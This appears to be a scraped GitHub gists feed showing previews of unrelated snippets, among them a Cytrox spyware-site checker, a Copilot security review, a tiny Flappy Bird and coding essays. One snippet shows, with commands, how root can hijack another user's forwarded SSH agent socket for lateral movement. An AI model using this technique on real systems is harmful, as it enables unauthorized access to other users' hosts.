@dspinellis
dspinellis / cytrox-check.sh
Last active May 29, 2022 14:39
Display host names of Cytrox spyware-hosting sites visited with Firefox
#!/usr/bin/env bash
#
# Display host names of Cytrox spyware-hosting sites visited with Firefox
# See: https://github.com/AmnestyTech/investigations/tree/master/2021-12-16_cytrox
#
# Diomidis Spinellis, May 2022
#
if [ -z "$1" ] ; then
echo "Usage: $0 /path/to/Firefox/places.sqlite" 1>&2
@moyix
moyix / emojiauthor.tex
Created December 13, 2021 19:52
Example of using emoji for author marks in IEEEtran
% This is for IEEEtran but should give an idea of how to do it for other styles
% Preamble
\usepackage{emoji}
% [...]
% This is the main piece; we just redefine the IEEEauthorrefmark command and
% replace the symbols. We have to remove the \ensuremath{} because emoji don't
% seem to work in math mode. You can of course replace these emoji with any of
% the ones defined by the emoji package:
@0xabad1dea
0xabad1dea / copilot-risk-assessment.md
Last active September 11, 2023 10:21
Risk Assessment of GitHub Copilot

Risk Assessment of GitHub Copilot

0xabad1dea, July 2021

this is a rough draft and may be updated with more examples

GitHub was kind enough to grant me swift access to the Copilot test phase despite me @'ing them several hundred times about ICE. I would like to examine it not in terms of productivity, but security. How risky is it to allow an AI to write some or all of your code?

Ultimately, a human being must take responsibility for every line of code that is committed. AI should not be used for "responsibility washing." However, Copilot is a tool, and workers need their tools to be reliable. A carpenter doesn't have to

Here's one of my favorite techniques for lateral movement: SSH agent forwarding. Use a UNIX-domain socket to advance your presence on the network. No need for passwords or keys.

root@bastion:~# find /tmp/ssh-* -type s
/tmp/ssh-srQ6Q5UpOL/agent.1460

root@bastion:~# SSH_AUTH_SOCK=/tmp/ssh-srQ6Q5UpOL/agent.1460 ssh [email protected]

user@internal:~$ hostname -f
internal.company.tld
@gullyn
gullyn / flappy.html
Last active January 24, 2025 00:41
Flappy bird in 205 bytes (improved!)
<body onload=z=c.getContext`2d`,setInterval(`c.width=W=150,Y<W&&P<Y&Y<P+E|9<p?z.fillText(S++${Y=`,9,9|z.fillRect(p`}*0,Y-=--M${Y+Y},P+E,9,W),P))):p=M=Y=S=6,p=p-6||(P=S%E,W)`,E=49) onclick=M=9><canvas id=c>
@moyix
moyix / README.txt
Created October 26, 2020 01:14
Recover edge information from afl-showmap
If you have a list of edge hashes produced by AFL (e.g. from something like this):
./afl-showmap -o foo.edges -t 500 -q -e -- ./program arg1
Re-run the program using gdb to trace the sequence of block IDs:
./collect_coverage.sh trace.txt ./program arg1
Print edges in the trace:
@muff-in
muff-in / resources.md
Last active April 16, 2025 15:12
A curated list of Assembly Language / Reversing / Malware Analysis / Game Hacking-resources
<#
.Requires -version 2 - Connect-MicrosoftTeams and then Run the script in Powershell
Updated on 28 Feb 2021
.SYNOPSIS
.\TeamsChannelMemberReport.ps1 - It Can Display all the Teams and its Channels and its members on a List
Or It can Export to a CSV file
With Export of Specific teams
@thrau
thrau / reasons-to-write-shell-scripts.md
Last active August 28, 2020 12:37
Why I write shell scripts

I write scripts to:

  • combine a sequence of commands i could type manually, but am too lazy to (example: proxy-chrome)
  • turn commands i need frequently but can't remember into ones i can (example: ex, ssh-forward, ishostup, rmcaps)
  • do things recursively on a file tree (rgit, mvnrc, chres)
  • perform transformation operations on many files that are too complicated for find (svg2pdf, imgscale)
  • systematize workflows into a script (mvn-release)
  • procrastinate (gdwc)

The given examples are a subset of all the scripts I have in my dotfiles that can be found in thrau/dotfiles.

@dreynaud
dreynaud / error-handling.md
Last active November 15, 2024 03:31
Error Handling in Practice

Error Handling in Practice

My experience is mostly with Java backend services in the cloud, so the advice in this post will almost certainly be biased towards this kind of error handling. But hopefully, some of it will be generally applicable and help you maintain and debug your programs in the long run.

I don't claim that these are universal best practices, but I have found these to be useful as general guidelines. As always, use your best judgment and do things that make sense in your context.

Log the whole thing

In Java, a full exception is: